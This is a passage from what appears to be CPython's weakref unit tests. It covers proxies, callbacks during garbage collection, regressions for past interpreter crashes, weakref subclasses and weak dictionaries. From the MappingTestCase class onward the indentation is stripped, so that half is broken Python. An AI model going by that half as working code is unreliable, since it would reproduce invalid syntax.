        self.assertIs(p1, p2, "both callbacks were None in the C API")
        del p1, p2
        p1 = makeref(o)
        p2 = makeref(o, None)
        self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
        del p1, p2
        p1 = makeref(o)
        p2 = makeref(o)
        self.assertIs(p1, p2, "both callbacks were NULL in the C API")
        del p1, p2
        p1 = makeref(o, None)
        p2 = makeref(o)
        self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
    def test_callable_proxy(self):
        o = Callable()
        ref1 = weakref.proxy(o)
        self.check_proxy(o, ref1)
        self.assertIs(type(ref1), weakref.CallableProxyType,
                      "proxy is not of callable type")
        ref1('twinkies!')
        self.assertEqual(o.bar, 'twinkies!',
                         "call through proxy not passed through to original")
        ref1(x='Splat.')
        self.assertEqual(o.bar, 'Splat.',
                         "call through proxy not passed through to original")
        # expect due to too few args
        self.assertRaises(TypeError, ref1)
        # expect due to too many args
        self.assertRaises(TypeError, ref1, 1, 2, 3)
    def check_proxy(self, o, proxy):
        # Helper: attribute get/set/del must be mirrored in both directions.
        o.foo = 1
        self.assertEqual(proxy.foo, 1,
                         "proxy does not reflect attribute addition")
        o.foo = 2
        self.assertEqual(proxy.foo, 2,
                         "proxy does not reflect attribute modification")
        del o.foo
        self.assertFalse(hasattr(proxy, 'foo'),
                         "proxy does not reflect attribute removal")
        proxy.foo = 1
        self.assertEqual(o.foo, 1,
                         "object does not reflect attribute addition via proxy")
        proxy.foo = 2
        self.assertEqual(o.foo, 2,
                         "object does not reflect attribute modification via proxy")
        del proxy.foo
        self.assertFalse(hasattr(o, 'foo'),
                         "object does not reflect attribute removal via proxy")
    def test_proxy_deletion(self):
        # Test clearing of SF bug #762891
        class Foo:
            result = None
            def __delitem__(self, accessor):
                self.result = accessor
        g = Foo()
        f = weakref.proxy(g)
        del f[0]
        self.assertEqual(f.result, 0)
    def test_proxy_bool(self):
        # Test clearing of SF bug #1170766
        class List(list): pass
        lyst = List()
        self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
    def test_getweakrefcount(self):
        o = C()
        ref1 = weakref.ref(o)
        ref2 = weakref.ref(o, self.callback)
        self.assertEqual(weakref.getweakrefcount(o), 2,
                         "got wrong number of weak reference objects")
        proxy1 = weakref.proxy(o)
        proxy2 = weakref.proxy(o, self.callback)
        self.assertEqual(weakref.getweakrefcount(o), 4,
                         "got wrong number of weak reference objects")
        del ref1, ref2, proxy1, proxy2
        self.assertEqual(weakref.getweakrefcount(o), 0,
                         "weak reference objects not unlinked from"
                         " referent when discarded.")
        # assumes ints do not support weakrefs
        self.assertEqual(weakref.getweakrefcount(1), 0,
                         "got wrong number of weak reference objects for int")
    def test_getweakrefs(self):
        o = C()
        ref1 = weakref.ref(o, self.callback)
        ref2 = weakref.ref(o, self.callback)
        del ref1
        self.assertEqual(weakref.getweakrefs(o), [ref2],
                         "list of refs does not match")
        o = C()
        ref1 = weakref.ref(o, self.callback)
        ref2 = weakref.ref(o, self.callback)
        del ref2
        self.assertEqual(weakref.getweakrefs(o), [ref1],
                         "list of refs does not match")
        del ref1
        self.assertEqual(weakref.getweakrefs(o), [],
                         "list of refs not cleared")
        # assumes ints do not support weakrefs
        self.assertEqual(weakref.getweakrefs(1), [],
                         "list of refs does not match for int")
    def test_newstyle_number_ops(self):
        class F(float):
            pass
        f = F(2.0)
        p = weakref.proxy(f)
        self.assertEqual(p + 1.0, 3.0)
        self.assertEqual(1.0 + p, 3.0)  # this used to SEGV
    def test_callbacks_protected(self):
        # Callbacks protected from already-set exceptions?
        # Regression test for SF bug #478534.
        class BogusError(Exception):
            pass
        data = {}
        def remove(k):
            del data[k]
        def encapsulate():
            f = lambda : ()
            data[weakref.ref(f, remove)] = None
            raise BogusError
        try:
            encapsulate()
        except BogusError:
            pass
        else:
            self.fail("exception not properly restored")
        try:
            encapsulate()
        except BogusError:
            pass
        else:
            self.fail("exception not properly restored")
    def test_sf_bug_840829(self):
        # "weakref callbacks and gc corrupt memory"
        # subtype_dealloc erroneously exposed a new-style instance
        # already in the process of getting deallocated to gc,
        # causing double-deallocation if the instance had a weakref
        # callback that triggered gc.
        # If the bug exists, there probably won't be an obvious symptom
        # in a release build.  In a debug build, a segfault will occur
        # when the second attempt to remove the instance from the "list
        # of all objects" occurs.
        import gc
        class C(object):
            pass
        c = C()
        wr = weakref.ref(c, lambda ignore: gc.collect())
        del c
        # There endeth the first part.  It gets worse.
        del wr
        c1 = C()
        c1.i = C()
        wr = weakref.ref(c1.i, lambda ignore: gc.collect())
        c2 = C()
        c2.c1 = c1
        del c1  # still alive because c2 points to it
        # Now when subtype_dealloc gets called on c2, it's not enough just
        # that c2 is immune from gc while the weakref callbacks associated
        # with c2 execute (there are none in this 2nd half of the test, btw).
        # subtype_dealloc goes on to call the base classes' deallocs too,
        # so any gc triggered by weakref callbacks associated with anything
        # torn down by a base class dealloc can also trigger double
        # deallocation of c2.
        del c2
    def test_callback_in_cycle_1(self):
        import gc
        class J(object):
            pass
        class II(object):
            def acallback(self, ignore):
                self.J
        I = II()
        I.J = J
        I.wr = weakref.ref(J, I.acallback)
        # Now J and II are each in a self-cycle (as all new-style class
        # objects are, since their __mro__ points back to them).  I holds
        # both a weak reference (I.wr) and a strong reference (I.J) to class
        # J.  I is also in a cycle (I.wr points to a weakref that references
        # I.acallback).  When we del these three, they all become trash, but
        # the cycles prevent any of them from getting cleaned up immediately.
        # Instead they have to wait for cyclic gc to deduce that they're
        # trash.
        #
        # gc used to call tp_clear on all of them, and the order in which
        # it does that is pretty accidental.  The exact order in which we
        # built up these things manages to provoke gc into running tp_clear
        # in just the right order (I last).  Calling tp_clear on II leaves
        # behind an insane class object (its __mro__ becomes NULL).  Calling
        # tp_clear on J breaks its self-cycle, but J doesn't get deleted
        # just then because of the strong reference from I.J.  Calling
        # tp_clear on I starts to clear I's __dict__, and just happens to
        # clear I.J first -- I.wr is still intact.  That removes the last
        # reference to J, which triggers the weakref callback.  The callback
        # tries to do "self.J", and instances of new-style classes look up
        # attributes ("J") in the class dict first.  The class (II) wants to
        # search II.__mro__, but that's NULL.  The result was a segfault in
        # a release build, and an assert failure in a debug build.
        del I, J, II
        gc.collect()
    def test_callback_in_cycle_2(self):
        import gc
        # This is just like test_callback_in_cycle_1, except that II is an
        # old-style class.  The symptom is different then:  an instance of an
        # old-style class looks in its own __dict__ first.  'J' happens to
        # get cleared from I.__dict__ before 'wr', and 'J' was never in II's
        # __dict__, so the attribute isn't found.  The difference is that
        # the old-style II doesn't have a NULL __mro__ (it doesn't have any
        # __mro__), so no segfault occurs.  Instead it got:
        #    test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
        #    Exception exceptions.AttributeError:
        #   "II instance has no attribute 'J'" in <bound method II.acallback
        #       of <?.II instance at 0x00B9B4B8>> ignored
        class J(object):
            pass
        class II:
            def acallback(self, ignore):
                self.J
        I = II()
        I.J = J
        I.wr = weakref.ref(J, I.acallback)
        del I, J, II
        gc.collect()
    def test_callback_in_cycle_3(self):
        import gc
        # This one broke the first patch that fixed the last two.  In this
        # case, the objects reachable from the callback aren't also reachable
        # from the object (c1) *triggering* the callback:  you can get to
        # c1 from c2, but not vice-versa.  The result was that c2's __dict__
        # got tp_clear'ed by the time the c2.cb callback got invoked.
        class C:
            def cb(self, ignore):
                self.me
                self.c1
                self.wr
        c1, c2 = C(), C()
        c2.me = c2
        c2.c1 = c1
        c2.wr = weakref.ref(c1, c2.cb)
        del c1, c2
        gc.collect()
    def test_callback_in_cycle_4(self):
        import gc
        # Like test_callback_in_cycle_3, except c2 and c1 have different
        # classes.  c2's class (C) isn't reachable from c1 then, so protecting
        # objects reachable from the dying object (c1) isn't enough to stop
        # c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
        # The result was a segfault (C.__mro__ was NULL when the callback
        # tried to look up self.me).
        class C(object):
            def cb(self, ignore):
                self.me
                self.c1
                self.wr
        class D:
            pass
        c1, c2 = D(), C()
        c2.me = c2
        c2.c1 = c1
        c2.wr = weakref.ref(c1, c2.cb)
        del c1, c2, C, D
        gc.collect()
    def test_callback_in_cycle_resurrection(self):
        import gc
        # Do something nasty in a weakref callback:  resurrect objects
        # from dead cycles.  For this to be attempted, the weakref and
        # its callback must also be part of the cyclic trash (else the
        # objects reachable via the callback couldn't be in cyclic trash
        # to begin with -- the callback would act like an external root).
        # But gc clears trash weakrefs with callbacks early now, which
        # disables the callbacks, so the callbacks shouldn't get called
        # at all (and so nothing actually gets resurrected).
        alist = []
        class C(object):
            def __init__(self, value):
                self.attribute = value
            def acallback(self, ignore):
                alist.append(self.c)
        c1, c2 = C(1), C(2)
        c1.c = c2
        c2.c = c1
        c1.wr = weakref.ref(c2, c1.acallback)
        c2.wr = weakref.ref(c1, c2.acallback)
        def C_went_away(ignore):
            alist.append("C went away")
        wr = weakref.ref(C, C_went_away)
        del c1, c2, C   # make them all trash
        self.assertEqual(alist, [])  # del isn't enough to reclaim anything
        gc.collect()
        # c1.wr and c2.wr were part of the cyclic trash, so should have
        # been cleared without their callbacks executing.  OTOH, the weakref
        # to C is bound to a function local (wr), and wasn't trash, so that
        # callback should have been invoked when C went away.
        self.assertEqual(alist, ["C went away"])
        # The remaining weakref should be dead now (its callback ran).
        self.assertEqual(wr(), None)
        del alist[:]
        gc.collect()
        self.assertEqual(alist, [])
    def test_callbacks_on_callback(self):
        import gc
        # Set up weakref callbacks *on* weakref callbacks.
        alist = []
        def safe_callback(ignore):
            alist.append("safe_callback called")
        class C(object):
            def cb(self, ignore):
                alist.append("cb called")
        c, d = C(), C()
        c.other = d
        d.other = c
        callback = c.cb
        c.wr = weakref.ref(d, callback)     # this won't trigger
        d.wr = weakref.ref(callback, d.cb)  # ditto
        external_wr = weakref.ref(callback, safe_callback)  # but this will
        self.assertIs(external_wr(), callback)
        # The weakrefs attached to c and d should get cleared, so that
        # C.cb is never called.  But external_wr isn't part of the cyclic
        # trash, and no cyclic trash is reachable from it, so safe_callback
        # should get invoked when the bound method object callback (c.cb)
        # -- which is itself a callback, and also part of the cyclic trash --
        # gets reclaimed at the end of gc.
        del callback, c, d, C
        self.assertEqual(alist, [])  # del isn't enough to clean up cycles
        gc.collect()
        self.assertEqual(alist, ["safe_callback called"])
        self.assertEqual(external_wr(), None)
        del alist[:]
        gc.collect()
        self.assertEqual(alist, [])
    def test_gc_during_ref_creation(self):
        self.check_gc_during_creation(weakref.ref)
    def test_gc_during_proxy_creation(self):
        self.check_gc_during_creation(weakref.proxy)
    def check_gc_during_creation(self, makeref):
        # Force GC to run on (nearly) every allocation while creating refs.
        thresholds = gc.get_threshold()
        gc.set_threshold(1, 1, 1)
        gc.collect()
        class A:
            pass
        def callback(*args):
            pass
        referenced = A()
        a = A()
        a.a = a
        a.wr = makeref(referenced)
        try:
            # now make sure the object and the ref get labeled as
            # cyclic trash:
            a = A()
            weakref.ref(referenced, callback)
        finally:
            gc.set_threshold(*thresholds)
    def test_ref_created_during_del(self):
        # Bug #1377858
        # A weakref created in an object's __del__() would crash the
        # interpreter when the weakref was cleaned up since it would refer to
        # non-existent memory.  This test should not segfault the interpreter.
        class Target(object):
            def __del__(self):
                global ref_from_del
                ref_from_del = weakref.ref(self)
        w = Target()
    def test_init(self):
        # Issue 3634
        # <weakref to class>.__init__() doesn't check errors correctly
        r = weakref.ref(Exception)
        self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
        # No exception should be raised here
        gc.collect()
    def test_classes(self):
        # Check that both old-style classes and new-style classes
        # are weakrefable.
        class A(object):
            pass
        class B:
            pass
        l = []
        weakref.ref(int)
        a = weakref.ref(A, l.append)
        A = None
        gc.collect()
        self.assertEqual(a(), None)
        self.assertEqual(l, [a])
        b = weakref.ref(B, l.append)
        B = None
        gc.collect()
        self.assertEqual(b(), None)
        self.assertEqual(l, [a, b])
    def test_equality(self):
        # Alive weakrefs defer equality testing to their underlying object.
        x = Object(1)
        y = Object(1)
        z = Object(2)
        a = weakref.ref(x)
        b = weakref.ref(y)
        c = weakref.ref(z)
        d = weakref.ref(x)
        # Note how we directly test the operators here, to stress both
        # __eq__ and __ne__.
        self.assertTrue(a == b)
        self.assertFalse(a != b)
        self.assertFalse(a == c)
        self.assertTrue(a != c)
        self.assertTrue(a == d)
        self.assertFalse(a != d)
        del x, y, z
        gc.collect()
        for r in a, b, c:
            # Sanity check
            self.assertIs(r(), None)
        # Dead weakrefs compare by identity: whether `a` and `d` are the
        # same weakref object is an implementation detail, since they pointed
        # to the same original object and didn't have a callback.
        # (see issue #16453).
        self.assertFalse(a == b)
        self.assertTrue(a != b)
        self.assertFalse(a == c)
        self.assertTrue(a != c)
        self.assertEqual(a == d, a is d)
        self.assertEqual(a != d, a is not d)
    def test_hashing(self):
        # Alive weakrefs hash the same as the underlying object
        x = Object(42)
        y = Object(42)
        a = weakref.ref(x)
        b = weakref.ref(y)
        self.assertEqual(hash(a), hash(42))
        del x, y
        gc.collect()
        # Dead weakrefs:
        # - retain their hash is they were hashed when alive;
        # - otherwise, cannot be hashed.
        self.assertEqual(hash(a), hash(42))
        self.assertRaises(TypeError, hash, b)
    def test_trashcan_16602(self):
        # Issue #16602: when a weakref's target was part of a long
        # deallocation chain, the trashcan mechanism could delay clearing
        # of the weakref and make the target object visible from outside
        # code even though its refcount had dropped to 0.  A crash ensued.
        class C(object):
            def __init__(self, parent):
                if not parent:
                    return
                wself = weakref.ref(self)
                def cb(wparent):
                    o = wself()
                self.wparent = weakref.ref(parent, cb)
        d = weakref.WeakKeyDictionary()
        root = c = C(None)
        for n in range(100):
            d[c] = c = C(c)
        del root
        gc.collect()
class SubclassableWeakrefTestCase(TestBase):
    """Tests for subclasses of weakref.ref: attributes, __slots__, sharing
    rules, callback semantics, and historical deallocation crashes."""
    def test_subclass_refs(self):
        class MyRef(weakref.ref):
            def __init__(self, ob, callback=None, value=42):
                self.value = value
                super(MyRef, self).__init__(ob, callback)
            def __call__(self):
                self.called = True
                return super(MyRef, self).__call__()
        o = Object("foo")
        mr = MyRef(o, value=24)
        self.assertIs(mr(), o)
        self.assertTrue(mr.called)
        self.assertEqual(mr.value, 24)
        del o
        self.assertIsNone(mr())
        self.assertTrue(mr.called)
    def test_subclass_refs_dont_replace_standard_refs(self):
        # A subclass ref and a plain ref to the same object must coexist;
        # the plain (shared) ref sorts first in getweakrefs().
        class MyRef(weakref.ref):
            pass
        o = Object(42)
        r1 = MyRef(o)
        r2 = weakref.ref(o)
        self.assertIsNot(r1, r2)
        self.assertEqual(weakref.getweakrefs(o), [r2, r1])
        self.assertEqual(weakref.getweakrefcount(o), 2)
        r3 = MyRef(o)
        self.assertEqual(weakref.getweakrefcount(o), 3)
        refs = weakref.getweakrefs(o)
        self.assertEqual(len(refs), 3)
        self.assertIs(r2, refs[0])
        self.assertIn(r1, refs[1:])
        self.assertIn(r3, refs[1:])
    def test_subclass_refs_dont_conflate_callbacks(self):
        # Distinct callbacks must yield distinct subclass ref objects.
        class MyRef(weakref.ref):
            pass
        o = Object(42)
        r1 = MyRef(o, id)
        r2 = MyRef(o, str)
        self.assertIsNot(r1, r2)
        refs = weakref.getweakrefs(o)
        self.assertIn(r1, refs)
        self.assertIn(r2, refs)
    def test_subclass_refs_with_slots(self):
        # __slots__ subclasses must work and must not grow a __dict__.
        class MyRef(weakref.ref):
            __slots__ = "slot1", "slot2"
            def __new__(type, ob, callback, slot1, slot2):
                return weakref.ref.__new__(type, ob, callback)
            def __init__(self, ob, callback, slot1, slot2):
                self.slot1 = slot1
                self.slot2 = slot2
            def meth(self):
                return self.slot1 + self.slot2
        o = Object(42)
        r = MyRef(o, None, "abc", "def")
        self.assertEqual(r.slot1, "abc")
        self.assertEqual(r.slot2, "def")
        self.assertEqual(r.meth(), "abcdef")
        self.assertFalse(hasattr(r, "__dict__"))
    def test_subclass_refs_with_cycle(self):
        # Bug #3110
        # An instance of a weakref subclass can have attributes.
        # If such a weakref holds the only strong reference to the object,
        # deleting the weakref will delete the object. In this case,
        # the callback must not be called, because the ref object is
        # being deleted.
        class MyRef(weakref.ref):
            pass
        # Use a local callback, for "regrtest -R::"
        # to detect refcounting problems
        def callback(w):
            self.cbcalled += 1
        o = C()
        r1 = MyRef(o, callback)
        r1.o = o
        del o
        del r1 # Used to crash here
        self.assertEqual(self.cbcalled, 0)
        # Same test, with two weakrefs to the same object
        # (since code paths are different)
        o = C()
        r1 = MyRef(o, callback)
        r2 = MyRef(o, callback)
        r1.r = r2
        r2.o = o
        del o
        del r2
        del r1 # Used to crash here
        self.assertEqual(self.cbcalled, 0)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(i, o) for i, o in enumerate(items))
# Keep an iterator alive
it = dct.iteritems()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
list(it)
del it
gc.collect()
n2 = len(dct)
# iteration should prevent garbage collection here
# Note that this is a test on an implementation detail. The requirement
# is only to provide stable iteration, not that the size of the container
# stay fixed.
self.assertEqual(n1, 20)
#self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda n, k: (k, n))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda n, k: (n, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.iteritems()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.iterkeyrefs())), len(objects))
for wr in dict.iterkeyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = dict.items()
for item in dict.iteritems():
items.remove(item)
self.assertEqual(len(items), 0, "iteritems() did not touch all items")
# key iterator, via __iter__():
keys = dict.keys()
for k in dict:
keys.remove(k)
self.assertEqual(len(keys), 0, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = dict.keys()
for k in dict.iterkeys():
keys.remove(k)
self.assertEqual(len(keys), 0, "iterkeys() did not touch all keys")
# value iterator:
values = dict.values()
for v in dict.itervalues():
values.remove(v)
self.assertEqual(len(values), 0,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertFalse(k in dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertFalse(k in dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertFalse(k in dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'iterkeys')
self.check_weak_destroy_while_iterating(dict, objects, 'iteritems')
self.check_weak_destroy_while_iterating(dict, objects, 'itervalues')
self.check_weak_destroy_while_iterating(dict, objects, 'iterkeyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.iteritems())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'iterkeys')
self.check_weak_destroy_while_iterating(dict, objects, 'iteritems')
self.check_weak_destroy_while_iterating(dict, objects, 'itervalues')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.iteritems())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = map(Object, range(self.COUNT))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = map(Object, range(self.COUNT))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict,
"mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict,
"original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(d.keys(), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(d.items(), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = d.keys()
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time thru the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
